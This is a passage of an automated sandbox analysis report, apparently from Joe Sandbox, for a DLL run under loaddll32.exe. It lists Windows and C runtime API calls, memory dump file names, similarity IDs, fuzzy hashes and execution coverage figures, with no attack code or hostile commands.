                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951DCA
                                                                                                  • Part of subcall function 6F95228C: InitializeSListHead.KERNEL32(6F967C70,6F951DD4,6F965708,00000010,6F951D65,?,?,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750), ref: 6F952291
                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F951E34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                • String ID:
                                                                                                • API String ID: 3231365870-0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 6F959678
                                                                                                • GetFileType.KERNELBASE(00000000), ref: 6F95968A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHandleType
                                                                                                • String ID:
                                                                                                • API String ID: 3000768030-0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6F95AEC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F9525B7
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6F952683
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9526A3
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9526AD
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6F954E4C
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F954E56
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6F954E63
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6F95EE20,?,?,00000008,?,?,6F95EA23,00000000), ref: 6F95F052
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6F95278E
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-0
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID: PATH$\
                                                                                                • API String ID: 485612231-1896636505
                                                                                                APIs
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9541D6
                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6F9541F8
                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6F954307
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9543D9
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6F95445D
                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6F954478
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 2123188842-393685449
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,6F95CFE1,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 6F95CDB7
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95CE72
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95CF01
                                                                                                • __freea.LIBCMT ref: 6F95CF4C
                                                                                                • __freea.LIBCMT ref: 6F95CF52
                                                                                                • __freea.LIBCMT ref: 6F95CF88
                                                                                                • __freea.LIBCMT ref: 6F95CF8E
                                                                                                • __freea.LIBCMT ref: 6F95CF9E
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                • String ID:
                                                                                                • API String ID: 127012223-0
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953047
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6F95304F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F9530D8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6F953103
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953158
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: 6dabe8bd651a882f88858d3b65ba6db7518de8536a96de84c1e85cadb246ec8b
                                                                                                • Instruction ID: ead23f0e58b78240c10f663c830149cce8d8a4e8ea26d57c37804581b3eba9f6
                                                                                                • Opcode Fuzzy Hash: 6dabe8bd651a882f88858d3b65ba6db7518de8536a96de84c1e85cadb246ec8b
                                                                                                • Instruction Fuzzy Hash: C7417234A00319ABDF10CF79C885E9EBBB6AF45368F108159E9149B3D2D732E925CF91
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000001,?,6F9531F1,6F952381,6F951D55,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086), ref: 6F953735
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F953743
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F95375C
                                                                                                • SetLastError.KERNEL32(00000000,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086,?,00000001,?), ref: 6F9537AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: cc2281c019edd921d842ec66aee1f84c51d2aa2c758fc477ff1fb2002e255d74
                                                                                                • Instruction ID: 55fdda806f67d341de7e6315f8943b37e07243cf9b6803278666ec7b786dd641
                                                                                                • Opcode Fuzzy Hash: cc2281c019edd921d842ec66aee1f84c51d2aa2c758fc477ff1fb2002e255d74
                                                                                                • Instruction Fuzzy Hash: 4F01F773A2CB115EBB1095B8ACD7E6A276ADB07779720032EE130D50E1EF51D835AA90
                                                                                                Strings
                                                                                                • C:\Windows\system32\loaddll32.exe, xrefs: 6F957FD9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Windows\system32\loaddll32.exe
                                                                                                • API String ID: 0-1062229814
                                                                                                • Opcode ID: a14bb15c37d60a286f0625b893b28e2a2e57ec3d5e5a9c851fc281ae84d76adb
                                                                                                • Instruction ID: 1597c5ab29c6056f2b844a429e15773aa7f25723b31fc11314ad33efb6e76bb7
                                                                                                • Opcode Fuzzy Hash: a14bb15c37d60a286f0625b893b28e2a2e57ec3d5e5a9c851fc281ae84d76adb
                                                                                                • Instruction Fuzzy Hash: 9D219D71218606AFEB24DFB5888099B77ADEF113687008918E919DB1D1EB30EC258BA0
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,6F953D2A,00000000,?,00000001,00000000,?,6F953DA1,00000001,FlsFree,6F960E2C,FlsFree,00000000), ref: 6F953CF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3664257935-2084034818
                                                                                                • Opcode ID: ad7b35e693053ff004a6380ad2c70a82dd44f2e5e314501ec7917911fc46011e
                                                                                                • Instruction ID: bf6d080421070cce3ce2d0b880099514b46054195cae0c3e3f03cb59de10071a
                                                                                                • Opcode Fuzzy Hash: ad7b35e693053ff004a6380ad2c70a82dd44f2e5e314501ec7917911fc46011e
                                                                                                • Instruction Fuzzy Hash: 2511A771A44621ABFF22CB78C942F5937A9AF02770F100215ED11AB1C0D770F920C6D5
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6417AA48,?,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F9552F3
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F955305
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F955327
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 86b17386e015d26b04162c864e44e22a488c0b66bee0cc5689ba68fc4fc320da
                                                                                                • Instruction ID: a2a5d3eee320de7d7d6efa6493a3a3008c493e11d049b6108d2eb59632f2bbfb
                                                                                                • Opcode Fuzzy Hash: 86b17386e015d26b04162c864e44e22a488c0b66bee0cc5689ba68fc4fc320da
                                                                                                • Instruction Fuzzy Hash: 23014471918919EBEF028B54CC44BBE7BB9FB45724F00062AF921E22D4DB75D910CA50
                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B6D9
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B7A2
                                                                                                • __freea.LIBCMT ref: 6F95B809
                                                                                                  • Part of subcall function 6F95786A: HeapAlloc.KERNEL32(00000000,00000000,?,?,6F951CD5,00000000,?,6F95175C,00000000,?,6F9510C9,00000000), ref: 6F95789C
                                                                                                • __freea.LIBCMT ref: 6F95B81C
                                                                                                • __freea.LIBCMT ref: 6F95B829
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1096550386-0
                                                                                                • Opcode ID: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction ID: 15b4db24f0c52991273d2f291cd5d2957f38f049bf9de9cdec2bb3f98edc1308
                                                                                                • Opcode Fuzzy Hash: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction Fuzzy Hash: 7C51A3729012066BEB18CE65DC80EBB7ABDDF94714F154129FE14DA1D1EB31EC6186A0
                                                                                                APIs
                                                                                                • GetConsoleOutputCP.KERNEL32(6417AA48,00000000,00000000,?), ref: 6F95BE59
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F95C0AB
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F95C0F1
                                                                                                • GetLastError.KERNEL32 ref: 6F95C194
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                • String ID:
                                                                                                • API String ID: 2112829910-0
                                                                                                • Opcode ID: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction ID: 5b3195121e167717b88fb6d5c62fec892058d9986fe1edb15ec81f1ed54de01d
                                                                                                • Opcode Fuzzy Hash: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction Fuzzy Hash: E5D18A75D042589FDF15CFA8C8809EDBBB8EF0A314F14812AE855AB291D730E952CF50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1740715915-0
                                                                                                • Opcode ID: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction ID: e94c86d600dc1b522e68b7f54a2c045815f7b12591a3e06eb6ac773d160087c9
                                                                                                • Opcode Fuzzy Hash: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction Fuzzy Hash: 8B51CC72604606AFEB19CF36D852FAAB7BAEF64314F10412AED15472D1E731E874CB90
                                                                                                APIs
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • GetLastError.KERNEL32 ref: 6F957991
                                                                                                • __dosmaperr.LIBCMT ref: 6F957998
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6F9579D2
                                                                                                • __dosmaperr.LIBCMT ref: 6F9579D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1913693674-0
                                                                                                • Opcode ID: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction ID: 78a20d634b7c6c4bc48c33d63c8dfc9a800d1de47c4891f9f1ab74e1c0d8c718
                                                                                                • Opcode Fuzzy Hash: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction Fuzzy Hash: A621B07120471EAF9B50DFB5C99085AB7ADEF01368710C519EE18871D0D730EE31CBA2
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6F958C36
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C6E
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 158306478-0
                                                                                                • Opcode ID: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction ID: 9347431251b9575f5978865984a4f43ff6e5c38502980fab9cede6ebc57645cd
                                                                                                • Opcode Fuzzy Hash: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction Fuzzy Hash: 0D11A5F151A615BFB71597B58ECCCAF396CDF562A97000114F501952C5EB30ED21C7B1
                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000), ref: 6F95D92D
                                                                                                • GetLastError.KERNEL32(?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?,?,6F95C78B,00000000), ref: 6F95D939
                                                                                                  • Part of subcall function 6F95D8FF: CloseHandle.KERNEL32(FFFFFFFE,6F95D949,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?), ref: 6F95D90F
                                                                                                • ___initconout.LIBCMT ref: 6F95D949
                                                                                                  • Part of subcall function 6F95D8C1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F95D8F0,6F95D0C4,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D8D4
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D95E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction ID: 8be10e3987927ed1fee0474222823d1413298eda69ff01bfbbaaef7112f550fb
                                                                                                • Opcode Fuzzy Hash: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction Fuzzy Hash: 61F0303640A555BBEF165F91DC44A993F77FF093B0B044059FB189A260CB32E930DB91
                                                                                                APIs
                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F9544A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2118026453-2084237596
                                                                                                • Opcode ID: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction ID: b081194dbf2f0f46654faa82a9f911484b17bc410737f2bd3b4605dd9e6d1423
                                                                                                • Opcode Fuzzy Hash: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction Fuzzy Hash: 8D4159B1900209AFDF05CFA8D891AEE7BB9BF48308F148199F91467291D336E971DF51

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:1316
                                                                                                Total number of Limit Nodes:27
